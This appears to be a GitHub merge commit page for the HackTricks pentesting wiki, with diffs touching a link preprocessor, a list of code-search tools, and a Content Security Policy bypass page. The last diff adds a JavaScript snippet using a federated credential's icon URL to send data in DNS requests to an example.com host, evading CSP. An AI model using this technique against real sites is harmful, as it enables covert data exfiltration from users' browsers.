Merge branch 'master' of github.com:HackTricks-wiki/hacktricks

HackTricks-wiki · Jan 27, 2025 · 76b3beb · 76b3beb
2 parents b9f636b + daba427
commit 76b3beb
Show file tree

Hide file tree

Showing 3 changed files with 21 additions and 1 deletion.
diff --git a/hacktricks-preprocessor.py b/hacktricks-preprocessor.py
@@ -78,6 +78,9 @@ def ref(matchobj):
                 sys.exit(1)
 
 
+    if href.endswith("/README.md"):
+        href = href.replace("/README.md", "/index.html")
+
     template = f"""<a class="content_ref" href="{href}"><span class="content_ref_label">{title}</span></a>"""
 
     # translate_table = str.maketrans({"\"":"\\\"","\n":"\\n"})

diff --git a/...thodologies-and-resources/external-recon-methodology/wide-source-code-search.md b/...thodologies-and-resources/external-recon-methodology/wide-source-code-search.md
@@ -6,7 +6,8 @@ The goal of this page is to enumerate **platforms that allow to search for code*
 
 This helps in several occasions to **search for leaked information** or for **vulnerabilities** patterns.
 
-- [**SourceGraph**](https://sourcegraph.com/search): Search in millions of repos. There is a free version and an enterprise version (with 15 days free). It supports regexes.
+- [**Sourcebot**](https://www.sourcebot.dev/): Open source code search tool. Index and search across thousands of your repos through a modern web interface.
+- [**SourceGraph**](https://sourcegraph.com/search): Search in millions of repos. There is a free version and an enterprise version (with 15 days free). It supports regexes. 
 - [**Github Search**](https://github.com/search): Search across Github. It supports regexes.
   - Maybe it's also useful to check also [**Github Code Search**](https://cs.github.com/).
 - [**Gitlab Advanced Search**](https://docs.gitlab.com/ee/user/search/advanced_search.html): Search across Gitlab projects. Support regexes.

diff --git a/src/pentesting-web/content-security-policy-csp-bypass/README.md b/src/pentesting-web/content-security-policy-csp-bypass/README.md
@@ -794,6 +794,22 @@ var pc = new RTCPeerConnection({
 pc.createOffer().then((sdp)=>pc.setLocalDescription(sdp);
 ```
 
+### CredentialsContainer
+
+The credential popup sends a DNS request to the iconURL without being restricted by the page. It only works in a secure context (HTTPS) or on localhost.
+
+```javascript
+navigator.credentials.store(
+  new FederatedCredential({
+    id:"satoki", 
+    name:"satoki", 
+    provider:"https:"+your_data+"example.com", 
+    iconURL:"https:"+your_data+"example.com"
+    })
+  )
+```
+
+
 ## Checking CSP Policies Online
 
 - [https://csp-evaluator.withgoogle.com/](https://csp-evaluator.withgoogle.com)